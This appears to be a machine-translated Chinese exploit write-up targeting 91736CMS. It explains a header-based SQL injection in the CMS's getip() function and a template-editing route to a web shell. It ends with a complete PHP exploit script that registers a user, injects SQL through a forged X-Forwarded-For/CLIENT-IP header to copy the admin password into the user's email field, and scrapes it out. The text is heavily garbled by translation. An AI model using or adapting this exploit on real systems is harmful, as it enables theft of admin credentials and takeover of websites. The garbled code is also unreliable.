Author: Yaseng & Desperado
Team: CodePlay
Reading the source code in Chinaz reveals the evil GetIp ()
// Obtain the IP address
Function getip (){
If (getenv ("HTTP_CLIENT_IP ")){
$ Httpip = getenv ("HTTP_CLIENT_IP ");
Return $ httpip;
}
If (getenv ("HTTP_X_FORWARDED_FOR ")){
$ Httpip = getenv ("HTTP_X_FORWARDED_FOR ");
Return $ httpip;
}
If (getenv ("HTTP_X_FORWARDED ")){
$ Httpip = getenv ("HTTP_X_FORWARDED ");
Return $ httpip;
}
If (getenv ("HTTP_FORWARDED_FOR ")){
$ Httpip = getenv ("HTTP_FORWARDED_FOR ");
Return $ httpip;
}
If (getenv ("HTTP_FORWARDED ")){
$ Httpip = getenv ("HTTP_FORWARDED ");
Return $ httpip;
}
$ Httpip = $ _ SERVER ['remote _ ADDR '];
Return $ httpip;
}
Many cms are dead here
The principles of Baidu
Use curl in the command line
1. Open php. ini and enable extension = php_curl.dll.
2. Check the directory of the extension_dir value of php. ini and whether php_curl.dll exists,
If not, download php_curl.dll and copy libeay32.dll and ssleay32.dll from the php Directory
C: \ windows \ system32
Give exp directly
For details, see the attachment 91736.php.
Operation demonstration
I admit that the previous technology is very old.
Something new
The above tmd5 cracking requires money. I used the local demo to get the shell in the background and came to the background getShell.
Happy to see bird template Management
Click to edit
Visual Testing is the Smarty template engine.
{Php}
Phpinfo ();
{/Php}
Since Shit prohibits bird php labels
Can you change the template file name?
Tamper check the post package
Index.html is 1.php
Tragedy. You have to find out how to overwrite the PHP file.
The template directory is in the system \ templates \ default12 directory
Find a php file common. inc. php In system
Cover his sister's
Change the file in tamper to ../common. inc. php.
View common. inc. php
Successfully written to php (ps: This method is cumbersome
Will make the website rotten
We recommend that you replace or
I got a sentence and recovered it.) I tested the website and found that the latest version had an error.
I have time to study it.
Done !!!
CodePlay code audit exchange group 209547366 (common progress)
91736. php
<? Php
Print_r ('
+ --------------------------------------------------------------------------- +
91736CMS Getip () Remote SQL Injection Exploit
By CodePlay Team (Yaseng & Desperado)
If expoit success you can see get admin pass
+ --------------------------------------------------------------------------- +
');
If ($ argc <4)
{
Print_r ('
+ --------------------------------------------------------------------------- +
Example:
Php '. $ argv [0]. 'localhost name pass
+ --------------------------------------------------------------------------- +
');
Exit;
}
Error_reporting (3 );
Ini_set ('max _ execution_time ', 0 );
$ Host = $ argv [1];
$ Username = $ argv [2];
$ Password = $ argv [3];
// Register a user
$ StyleUrl = $ host. "/index. php? M = member & f = register_save ";
$ StyleData = "username = {$ username} & password = {$ password} & password2 = {$ password} & fields % 5 Btruename % 5D = {$ username} & fields % 5 bemail % 5D = {$ username} & submit = + % D7 % A2 + % B2 % E1 + ";
$ Ch = curl_init ($ styleUrl );
Curl_setopt ($ ch, CURLOPT_HEADER, 0 );
Curl_setopt ($ ch, CURLOPT_RETURNTRANSFER, 1 );
Curl_setopt ($ ch, CURLOPT_POSTFIELDS, $ styleData );
Curl_setopt ($ ch, CURLOPT_POST, 1 );
$ Token = curl_exec ($ ch );
Curl_close ($ ch );
$ Cookie_file = tempnam ('./temp', 'cooker ');
$ Site = $ host;
$ Post_fields = "username = {$ username} & password = {$ password} & button = + % B5 % C7 % C2 % BC + ";
// Login packet www.2cto.com
$ Login_url = $ site. "/index. php? M = member & f = login_save ";
$ Cookie_file = tempnam ('./temp', 'cooker ');
$ Ch = curl_init ($ login_url );
Curl_setopt ($ ch, CURLOPT_HEADER, 0 );
Curl_setopt ($ ch, CURLOPT_RETURNTRANSFER, 1 );
Curl_setopt ($ ch, CURLOPT_HTTPHEADER, array ('x-FORWARDED-FOR: fuck ', "CLIENT-IP: fuck by C.P. t', 'email '= (SELECT password FROM 'C _ admin'), 'logins' = 4 WHERE 'username' =' $ username '#"));
// Construct an IP address
Curl_setopt ($ ch, CURLOPT_POST, 1 );
Curl_setopt ($ ch, CURLOPT_POSTFIELDS, $ post_fields );
Curl_setopt ($ ch, CURLOPT_COOKIEJAR, $ cookie_file );
Curl_exec ($ ch );
Curl_close ($ ch );
$ StyleUrl = $ host. "/index. php? M = member & f = edit ";
$ StyleData = "";
$ Ch = curl_init ($ styleUrl );
Curl_setopt ($ ch, CURLOPT_HEADER, 0 );
Curl_setopt ($ ch, CURLOPT_RETURNTRANSFER, 1 );
Curl_setopt ($ ch, CURLOPT_COOKIEFILE, $ cookie_file );
Curl_setopt ($ ch, CURLOPT_POSTFIELDS, $ styleData );
Curl_setopt ($ ch, CURLOPT_POST, 1 );
$ Data = curl_exec ($ ch );
Curl_close ($ ch );
$ Regex = "/id = \" email \ "(. *) <\/td>/I ";
Preg_match ($ regex, $ data, $ result );
$ Regex = "/value = \"(.*)\"/";
If (preg_match ($ regex, $ result [0], $ pass )){
Echo "shit pass:". $ pass [1]. "and login the admin Panel to getShell ";
}
Else {
Echo "fuck !!! You are field ";
}
?>